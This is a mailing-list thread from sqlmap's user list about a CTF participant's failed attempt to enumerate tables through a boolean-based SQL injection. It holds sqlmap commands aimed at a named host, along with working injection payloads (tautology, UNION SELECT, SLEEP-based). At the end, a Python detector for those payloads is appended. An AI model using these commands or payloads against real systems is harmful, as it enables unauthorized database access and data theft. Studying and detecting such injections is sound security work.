Okay, I resolved it. :)
Thanks a lot Chris and Miroslav... I resolved this problem. :)
Not sqlmap 1.0 but r4766
Not sqlmap 0.9 but r5022
It should be 1.0 and r5022
Thanks so much again :)
Best Regards
On 27 April 2012 20:42, Chris Oakley <christopher.oak...@gmail.com> wrote:
> Hi
>
> Just thought I'd point out that it looks like you're running 0.9 stable
> and not the 1.0 latest repository version.
>
> Regards
>
> Chris
>
>
> 2012/4/27 Fırat Celal Erdik <fc.er...@gmail.com>
>
>> Hi Miroslav,
>> First, thanks a lot for your fast reply. I found this value (38' OR
>> '38'='38) in the w3af output. As you know, w3af is a vulnerability
>> scanner for web applications. I got this value from w3af, and I attached a
>> w3af screenshot of this vulnerability. This is a boolean-based SQL
>> injection.
>>
>> When I gave this value (38' OR '38'='38) to the "kelime" parameter
>> manually in sqlmap revision r4766, I got the output below when enumerating
>> database names.
>>
>> root@pamuksekeri-pc:/pentest/database/sqlmap# ./sqlmap.py -u
>> http://level4.hack2net.com/projects.php --forms --dbs
>> .....
>> .....
>> POST http://level4.hack2net.com:80/projects.php?form=ara
>> POST data: kelime=&tur=1&aramayap=Ara
>> do you want to test this form? [Y/n/q]
>> > y
>>
>> .....
>> .....
>> Edit POST data [default: kelime=&tur=1&aramayap=Ara] (Warning: blank
>> fields detected): kelime=38' OR '38'='38
>> .....
>> .....
>>
>> web application technology: PHP 5.3.5
>> back-end DBMS: MySQL 5.0.11
>> [17:27:54] [INFO] fetching database names
>> available databases [4]:
>> [*] ctf2
>> [*] information_schema
>> [*] mysql
>> [*] test
>>
>> After this database name enumeration, I gave the command below to
>> enumerate table names, but sqlmap didn't find any table names:
>>
>> root@pamuksekeri-pc:/pentest/database/sqlmap# ./sqlmap.py -u
>> http://level4.hack2net.com/projects.php --forms -D ctf2 --tables
>> .....
>> .....
>> POST http://level4.hack2net.com:80/projects.php?form=ara
>> POST data: kelime=&tur=1&aramayap=Ara
>> do you want to test this form? [Y/n/q]
>> > y
>> Edit POST data [default: kelime=&tur=1&aramayap=Ara] (Warning: blank
>> fields detected): kelime=38' OR '38'='38
>> .....
>> .....
>> but sqlmap didn't find any table names; it skipped to the second form.
>>
>> I updated to sqlmap revision r5022 now, but now I don't get any database
>> names :) The output is below.
>>
>> root@pamuksekeri-pc:/home/pamuksekeri/Desktop/sqlmap# ./sqlmap.py -u
>> http://level4.hack2net.com/projects.php --forms --dbs
>>
>> sqlmap/0.9 - automatic SQL injection and database takeover tool
>> http://sqlmap.sourceforge.net
>>
>> [*] starting at: 19:46:09
>>
>> [19:46:12] [INFO] testing connection to the target url
>> [19:46:21] [INFO] searching for forms
>> [19:46:22] [INFO] sqlmap got a total of 2 targets
>> [#1] form:
>> POST http://level4.hack2net.com:80/projects.php?form=ara
>> POST data: kelime=&tur=1&aramayap=Ara
>> do you want to test this form? [Y/n/q]
>> > y
>> Edit POST data [default: kelime=&tur=1&aramayap=Ara] (Warning: blank
>> fields detected): kelime=38' OR '38'='38&tur=4&aramayap=Ara
>> [19:47:31] [INFO] using '/home/pamuksekeri/Desktop/sqlmap/output/
>> level4.hack2net.com/session' as session file
>> [19:47:50] [INFO] testing if the url is stable, wait a few seconds
>> [19:47:54] [INFO] url is stable
>> [19:47:54] [INFO] testing if POST parameter 'tur' is dynamic
>> [19:47:59] [INFO] confirming that POST parameter 'tur' is dynamic
>> [19:48:00] [INFO] POST parameter 'tur' is dynamic
>> [19:48:01] [WARNING] heuristic test shows that POST parameter 'tur' might
>> not be injectable
>> [19:48:01] [INFO] testing sql injection on POST parameter 'tur'
>> [19:48:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>> clause'
>> [19:48:23] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING
>> clause'
>> [19:48:26] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING
>> clause'
>> [19:48:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based -
>> WHERE or HAVING clause'
>> [19:48:32] [INFO] testing 'Oracle AND error-based - WHERE or HAVING
>> clause (XMLType)'
>> [19:48:36] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>> [19:48:39] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
>> [19:48:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
>> [19:48:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>> [19:48:49] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
>> [19:48:52] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
>> [19:48:56] [INFO] testing 'Oracle AND time-based blind'
>> [19:49:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
>> [19:49:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> [19:49:49] [WARNING] using unescaped version of the test because of zero
>> knowledge of the back-end DBMS
>> [19:50:51] [WARNING] POST parameter 'tur' is not injectable
>> [19:50:51] [INFO] testing if POST parameter 'aramayap' is dynamic
>> [19:50:52] [WARNING] POST parameter 'aramayap' is not dynamic
>> [19:50:53] [WARNING] heuristic test shows that POST parameter 'aramayap'
>> might not be injectable
>> [19:50:53] [INFO] testing sql injection on POST parameter 'aramayap'
>> [19:50:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>> clause'
>> [19:51:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING
>> clause'
>> [19:51:06] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING
>> clause'
>> [19:51:10] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based -
>> WHERE or HAVING clause'
>> [19:51:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING
>> clause (XMLType)'
>> [19:51:22] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>> [19:51:27] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
>> [19:51:33] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
>> [19:51:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>> [19:51:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
>> [19:51:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
>> [19:51:56] [INFO] testing 'Oracle AND time-based blind'
>> [19:52:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
>> [19:52:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> [19:52:49] [WARNING] using unescaped version of the test because of zero
>> knowledge of the back-end DBMS
>> [19:53:47] [CRITICAL] connection timed out to the target url or proxy,
>> sqlmap is going to retry the request
>> [19:54:04] [WARNING] POST parameter 'aramayap' is not injectable
>> [19:54:04] [INFO] testing if GET parameter 'form' is dynamic
>> [19:54:06] [WARNING] GET parameter 'form' is not dynamic
>> [19:54:07] [WARNING] heuristic test shows that GET parameter 'form' might
>> not be injectable
>> [19:54:07] [INFO] testing sql injection on GET parameter 'form'
>> [19:54:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>> clause'
>> [19:54:34] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING
>> clause'
>> [19:54:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING
>> clause'
>> [19:55:00] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based -
>> WHERE or HAVING clause'
>> [19:55:07] [INFO] testing 'Oracle AND error-based - WHERE or HAVING
>> clause (XMLType)'
>> [19:55:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>> [19:55:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
>> [19:55:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
>> [19:55:27] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>> [19:55:30] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
>> [19:55:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
>> [19:55:39] [INFO] testing 'Oracle AND time-based blind'
>> [19:55:44] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
>> [19:57:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> [19:57:05] [WARNING] using unescaped version of the test because of zero
>> knowledge of the back-end DBMS
>> [19:57:53] [WARNING] GET parameter 'form' is not injectable
>> [19:57:54] [ERROR] all parameters are not injectable, try to increase
>> --level/--risk values to perform more tests. Rerun without providing the
>> --technique switch. Give it a go with the --text-only switch if the target
>> page has a low percentage of textual content (~22.06% of page content is
>> text), skipping to the next form
>> [#2] form:
>> POST http://level4.hack2net.com:80/projects.php
>> POST data: Ara=Ara
>> do you want to test this form? [Y/n/q]
>> > n
>>
>> [*] shutting down at: 20:04:22
>>
>> Then I pressed enter without editing the POST data in this command.
>> The output is below (in revision r5022).
>>
>> root@pamuksekeri-pc:/home/pamuksekeri/Desktop/sqlmap# ./sqlmap.py -u
>> http://level4.hack2net.com/projects.php --forms --dbs
>>
>> sqlmap/0.9 - automatic SQL injection and database takeover tool
>> http://sqlmap.sourceforge.net
>>
>> [*] starting at: 20:04:31
>>
>> [20:04:32] [INFO] testing connection to the target url
>> [20:04:39] [INFO] searching for forms
>> [20:04:40] [INFO] sqlmap got a total of 2 targets
>> [#1] form:
>> POST http://level4.hack2net.com:80/projects.php?form=ara
>> POST data: kelime=&tur=1&aramayap=Ara
>> do you want to test this form? [Y/n/q]
>> > y
>> Edit POST data [default: kelime=&tur=1&aramayap=Ara] (Warning: blank
>> fields detected):
>> do you want to fill blank fields with random values? [Y/n] y
>> [20:04:46] [INFO] using '/home/pamuksekeri/Desktop/sqlmap/output/
>> level4.hack2net.com/session' as session file
>> [20:04:48] [INFO] testing if the url is stable, wait a few seconds
>> [20:04:50] [INFO] url is stable
>> [20:04:50] [INFO] testing if POST parameter 'kelime' is dynamic
>> [20:04:52] [WARNING] POST parameter 'kelime' is not dynamic
>> [20:04:54] [WARNING] heuristic test shows that POST parameter 'kelime'
>> might not be injectable
>> [20:04:54] [INFO] testing sql injection on POST parameter 'kelime'
>> [20:04:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>> clause'
>> [20:05:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING
>> clause'
>> [20:05:15] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING
>> clause'
>> [20:05:20] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based -
>> WHERE or HAVING clause'
>> [20:05:27] [INFO] testing 'Oracle AND error-based - WHERE or HAVING
>> clause (XMLType)'
>> [20:05:33] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>> [20:05:38] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
>> [20:05:43] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
>> [20:05:48] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>> [20:05:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
>> [20:06:00] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
>> [20:06:05] [INFO] testing 'Oracle AND time-based blind'
>> [20:06:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
>> [20:06:21] [CRITICAL] unable to connect to the target url or proxy,
>> sqlmap is going to retry the request
>> [20:07:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> [20:07:15] [WARNING] using unescaped version of the test because of zero
>> knowledge of the back-end DBMS
>> [20:08:07] [WARNING] POST parameter 'kelime' is not injectable
>>
>> sqlmap said the kelime parameter is not vulnerable :) Why?? I know this
>> parameter is vulnerable, because other competitors in the CTF exploited this
>> vulnerability and got all the data in the database :) The w3af output says this
>> parameter is vulnerable.
>>
>> How can I find the right vulnerable point in http://level4.hack2net.com/ and
>> exploit it successfully? If you have any time to help me with this topic, I
>> will be so happy :)
>>
>> Thanks a lot again.
>> Best Regards
>>
>>
>> On 27 April 2012 16:17, Miroslav Stampar <
>> miroslav.stam...@gmail.com> wrote:
>>
>>> Hi Firat.
>>>
>>> First of all please always keep your sqlmap up to date. Current revision
>>> is r5022 and you are running r4766.
>>>
>>> Second, could you please explain how you got "OR '38'='38'" inside
>>> those payloads. We already have mechanisms to prevent this kind of
>>> "user behavior" but you've obviously circumvented that somehow (--prefix or
>>> maybe you've entered that one manually inside the form search prompts). The
>>> thing is that OR A=A is never a smart thing to do inside a SQL injection tool.
>>> That's simply because OR 1=1 always results in TRUE, potentially screwing the
>>> user with false results.
>>>
>>> Third, it would be great if you could send database names you've
>>> retrieved. It's quite possible that there are some permission problems you
>>> are experiencing around system "mysql" database. Also, you are maybe
>>> experiencing permission problems when accessing "information_schema"
>>> database for retrieving identifier names.
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>> 2012/4/27 Fırat Celal Erdik <fc.er...@gmail.com>
>>>
>>>> Hi,
>>>> Is there anybody who can help me with a MySQL boolean-based SQL injection
>>>> exploitation with sqlmap? I found database names with sqlmap but I didn't
>>>> find any tables in any database. I don't want to find table names from a
>>>> common table names file. So, how can I get the full table names
>>>> with sqlmap or another tool? I tried Havij but I could not find any table
>>>> name with it. Does anyone have any idea?
>>>>
>>>> I had this error in sqlmap:
>>>>
>>>> ./sqlmap.py -u http://level4.hack2net.com/projects.php --forms -D
>>>> mysql --tables
>>>>
>>>> sqlmap/1.0-dev (r4766) - automatic SQL injection and database
>>>> takeover tool
>>>> http://www.sqlmap.org
>>>>
>>>> [!] legal disclaimer: usage of sqlmap for attacking targets without
>>>> prior mutual consent is illegal. It is the end user's responsibility to
>>>> obey all applicable local, state and federal laws. Authors assume no
>>>> liability and are not responsible for any misuse or damage caused by this
>>>> program
>>>>
>>>> [*] starting at 15:01:42
>>>>
>>>> [15:01:42] [INFO] testing connection to the target url
>>>> [15:01:43] [INFO] searching for forms
>>>> [15:01:43] [INFO] sqlmap got a total of 2 targets
>>>> [#1] form:
>>>> POST http://level4.hack2net.com:80/projects.php?form=ara
>>>> POST data: kelime=&tur=1&aramayap=Ara
>>>> do you want to test this form? [Y/n/q]
>>>> > y
>>>> Edit POST data [default: kelime=&tur=1&aramayap=Ara] (Warning: blank
>>>> fields detected):
>>>> do you want to fill blank fields with random values? [Y/n] y
>>>> [15:01:50] [INFO] using '/pentest/database/sqlmap/output/
>>>> level4.hack2net.com/session' as session file
>>>> [15:01:50] [INFO] resuming injection data from session file
>>>> [15:01:50] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session
>>>> file
>>>> [15:01:50] [INFO] using
>>>> '/pentest/database/sqlmap/output/results-04272012_0301pm.csv' as results
>>>> file
>>>> sqlmap identified the following injection points with a total of 0
>>>> HTTP(s) requests:
>>>> ---
>>>> Place: POST
>>>> Parameter: kelime
>>>>     Type: boolean-based blind
>>>>     Title: AND boolean-based blind - WHERE or HAVING clause
>>>>     Payload: kelime=38' OR '38'='38' AND 5116=5116 AND
>>>> 'Hbnf'='Hbnf&tur=4&aramayap=Ara
>>>>
>>>>     Type: UNION query
>>>>     Title: MySQL UNION query (NULL) - 5 columns
>>>>     Payload: kelime=38' OR '38'='38' UNION ALL SELECT
>>>> CONCAT(0x3a6e656f3a,0x65594a514b5846697976,0x3a776f673a), NULL, NULL, NULL,
>>>> NULL# AND 'ecra'='ecra&tur=4&aramayap=Ara
>>>>
>>>>     Type: AND/OR time-based blind
>>>>     Title: MySQL > 5.0.11 AND time-based blind
>>>>     Payload: kelime=38' OR '38'='38' AND SLEEP(5) AND
>>>> 'mlpI'='mlpI&tur=4&aramayap=Ara
>>>> ---
>>>>
>>>> do you want to exploit this SQL injection? [Y/n] y
>>>> [15:01:56] [INFO] the back-end DBMS is MySQL
>>>>
>>>> web application technology: PHP 5.3.5
>>>> back-end DBMS: MySQL 5.0.11
>>>> [15:01:56] [INFO] fetching tables for database: mysql
>>>> [15:01:56] [INFO] fetching number of tables for database 'mysql'
>>>> [15:01:56] [WARNING] running in a single-thread mode. Please consider
>>>> usage of option '--threads' for faster data retrieval
>>>> [15:01:56] [INFO] retrieved:
>>>> [15:01:58] [WARNING] unable to retrieve the number of tables for
>>>> database 'mysql'
>>>> [15:01:58] [ERROR] unable to retrieve the table names for any database
>>>> do you want to use common table existence check? [Y/n/q]
>>>>
>>>> Thanks a lot..
>>>>
>>>> --
>>>> Fırat Celal Erdik
>>>> Security Specialist, Certified Ethical Hacker - C|EH
>>>> http://www.networkpentest.net
>>>>
>>>>
>>>>
>>>>
>>>> ------------------------------------------------------------------------------
>>>> Live Security Virtual Conference
>>>> Exclusive live event will cover all the ways today's security and
>>>> threat landscape has changed and how IT managers can respond. Discussions
>>>> will include endpoint security, mobile security and the latest in malware
>>>> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sqlmap-users@lists.sourceforge.net
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>
>>>>
>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>>
>>
>>
>>
>> --
>> Fırat Celal Erdik
>> Security Specialist, Certified Ethical Hacker - C|EH
>> http://www.networkpentest.net
>
--
Fırat Celal Erdik
Security Specialist, Certified Ethical Hacker - C|EH
http://www.networkpentest.net
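Added example, not from this thread or from sqlmap: a small detector over constructed POST bodies that flags the tautology shapes (OR '38'='38, AND 5116=5116, AND 'Hbnf'='Hbnf) and the SLEEP() probe quoted in the sqlmap output above, the kind of check a WAF rule or a log review would apply; the parameter names and the sample bodies are modelled on the thread's output and are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample POST bodies modelled on the payloads quoted in the thread:
# the first is an ordinary form submission, the others carry injection probes.
SAMPLE_BODIES = [
    "kelime=sunucu&tur=1&aramayap=Ara",
    "kelime=38' OR '38'='38&tur=4&aramayap=Ara",
    "kelime=38' OR '38'='38' AND 5116=5116 AND 'Hbnf'='Hbnf&tur=4&aramayap=Ara",
    "kelime=38' OR '38'='38' AND SLEEP(5) AND 'mlpI'='mlpI&tur=4&aramayap=Ara",
]

# OR/AND followed by a comparison whose two sides are the same literal,
# quoted ('38'='38, 'Hbnf'='Hbnf) or bare (5116=5116).  The closing quote is
# optional because the application's own quote usually terminates the string.
TAUTOLOGY = re.compile(r"(?i)\b(OR|AND)\s+('?)(\w+)\2\s*=\s*\2\3\2?")
# MySQL time-based probe, as in the third payload sqlmap reported.
TIME_BASED = re.compile(r"(?i)\bSLEEP\s*\(\s*\d+\s*\)")


def scan_body(body: str) -> list:
    """Return (parameter, reason, matched_text) findings for one POST body.

    parse_qsl splits each pair on its first '=', so the '=' characters inside
    an injected value stay part of the value rather than starting a new pair.
    """
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        for m in TAUTOLOGY.finditer(value):
            findings.append((name, "tautology", m.group(0)))
        for m in TIME_BASED.finditer(value):
            findings.append((name, "time-based", m.group(0)))
    return findings


def flagged_parameters(bodies=SAMPLE_BODIES) -> dict:
    """Count, per parameter name, how many bodies produced at least one finding."""
    counts = {}
    for body in bodies:
        for name in {f[0] for f in scan_body(body)}:
            counts[name] = counts.get(name, 0) + 1
    return counts


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(body)
        for finding in scan_body(body):
            print("   ", finding)
    print(flagged_parameters())
```

Only the kelime parameter is flagged, which matches where the thread's injection actually sits; the tur and aramayap values pass clean.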